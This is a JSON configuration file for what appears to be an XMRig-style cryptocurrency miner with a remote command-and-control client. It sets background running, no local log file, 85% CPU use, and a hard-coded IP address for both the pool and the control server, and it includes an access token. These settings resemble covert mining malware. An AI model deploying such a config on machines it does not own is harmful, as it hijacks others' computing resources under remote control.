{
    "autosave": true,
    "background": true,
    "colors": true,
    "donate-level": 1,
    "donate-over-proxy": 1,
    "log-file": false,
    "cpu": {
        "max-cpu-usage": 85
    },

    "pools": [
        {
            "url": "185.103.109.46:443",
	    "enabled": true,
            "tls": true
        }
    ],
    "cc-client": {
        "enabled": true,
        "url": "185.103.109.46:80",
        "access-token": "dfkl8956Ld4LKjfg3pnassq",
        "use-tls": true,
        "use-remote-logging": true,
        "upload-config-on-start": true,
        "worker-id": null,
        "reboot-cmd": null,
        "update-interval-s": 120
    }
}